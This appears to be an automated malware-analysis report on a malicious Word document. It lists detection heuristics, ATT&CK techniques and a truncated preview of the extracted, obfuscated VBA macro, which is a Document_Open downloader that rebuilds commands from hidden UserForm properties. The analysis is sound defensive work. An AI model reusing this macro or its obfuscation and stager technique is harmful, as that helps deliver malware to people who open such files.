Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate a hidden-property command stager within a UserForm, designed for auto-execution via the Document_Open macro. This suggests the primary function is to download and execute a secondary payload, aligning with the ClamAV detection of a downloader.
Heuristics (7)
- ClamAV: Doc.Downloader.Generic-7452078-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7452078-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 360baa2e8371d149970bac6b48fa0b4ead77c6c70f170b7b260c86e68e558e14) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10991 bytes |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Wzlsluxcmitn"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Frxrexkafow, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Zfrwazjrxmqtc = Gghpxzqlx
Sewtqckfpkzw = Qpbbnjuj
Hqiaajuu = Geudvnjwz
Select _
Case Kcpgjokkt
Case 172
Jvlzujffqf _
= Hex _
(209)
Tmuxfzzxjbuxn = CVar(509)
Qukjaixvzrwt _
= Hex(981)
Case 591
Tdbigvtoqekt = CVar(30)
Haolbool _
= 899
Bnwrufjgzfqys = CDate _
(364)
Case 520
Xbbdfyhgw = _
CInt(470)
Dkrmcixghtzcu = Log(Etwjiizeemnh)
Tgzdvczomdibl = Xzhtkunkmfq
End Select
Vbeuvvmli = Zmrmmqwzqzv
Iikimmdgaxr = Zhykdcpe
Emrkcmufaeq = Kezvvkyoaul
Select _
Case Afwtiidufvu
Case 221
Tgsroknt _
= Hex _
(626)
Dguugyesf = CVar(883)
Mojgvhiteje _
= Hex(906)
Case 416
Qswigbdvmasm = CVar(886)
Xvbcpimhril _
= 800
Eajwynzd = CDate _
(758)
Case 307
Wmepsaoq = _
CInt(82)
Tlxdgplii = Log(Xnyzvcdtzol)
Eqlsuhcsqkjs = Pjcrumnzy
End Select
Lanbfrocgr = Esklhhjdu
Hakywhmrlt = Tbmzweudv
Jaixnbppqqq = Vtsuuzxn
Select _
Case Rjvimzzrod
Case 661
Xnkyqwdl _
= Hex _
(89)
Vlecmajw = CVar(780)
Hornstcq _
= Hex(839)
Case 540
Bcruwekvibkqx = CVar(915)
Jdknyhsxhtj _
= 354
Gxtmupbsukghp = CDate _
(909)
Case 125
Esqqdyiprds = _
CInt(433)
Ejaminolhx = Log(Mwotdfjtf)
Dtsyyibjbyt = Jtycabwvuh
End Select
Lcjxqrregfpv
End Sub
Attribute VB_Name = "Eailhicuzjotr"
Attribute VB_Base = "0{A0DE5B0E-3A42-4D31-AD8D-9BF7FB3C621F}{C31CCB3A-629D-4A31-8589-006693104201}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ladkdwna"
Function Tykabrwzuun()
Qoryrtuxjxfxp = Fptsiuvgnf
Qzpihlmnst = Ezmujhlyiqgl
Hcuheswi = Upylchtlpanji
Select _
Case Gtwczsdreeksl
Case 219
Vwvoatizv _
= Hex _
(262)
Vvppxuukyzzfd = CVar(464)
Xuhsoiwjfqo _
= Hex(240)
Case 9
Dxtbacxicogpy = CVar(398)
Gvrrjkwoscn _
= 990
Lkyjauhbfyeah = CDate _
(622)
Case 312
Fadphgdjzwjp = _
CInt(289)
Bznozwrqxp = Log(Paxmqccajrzx)
Iaznrfarezrm = Dpdnlorcmn
End Select
Bahavnjxvpr = Wzlsluxcmitn.Frxrexkafow
Klwlwotnisrch = Cqzaqyykcsf
Ifmwogot = Wmbidccsrar
Sfhbmausqu = Cgunahuwc
Select _
Case Ppvhzzosjkw
Case 936
Gfbtmvfrjda _
= Hex _
(487)
Fqswbgpqs = CVar(298)
Suscbjugmdgv _
= Hex(820)
Case 817
Khxwfmul = CVar(217)
Xamjpdaoujar _
= 600
Pajtjeyv = CDate _
(58)
Case 109
Rystnywhcxeb = _
CInt(523)
Qidsawaset = Log(Dbbmwbnrr)
Gavmtpeyod = Bbfupuzu
End Select
Zfiwvmskvqzu = Bahavnjxvpr + Eailhicuzjotr.Zrlpryhuqkt + Eailhicuzjotr.Leduriedcjuge + Eailhicuzjotr.Yzvfmnkir
Jvivsalsfz = Pkossydc
Zjxidxwcbzcl = Lhdzgktxbenhd
Dhxjsvyyj = Wcxvzdpshku
Select _
Case Tycitvvueyxse
Case 1
Amjucsoq _
= Hex _
(977)
Ejslktjcb = CVar(788)
Tqeobtreadua _
= Hex(752)
Case 520
Vaabcfhccold = CVar(315)
Enpcnigwefbz _
= 983
Yckiftpsjb = CDate _
(532)
... (truncated)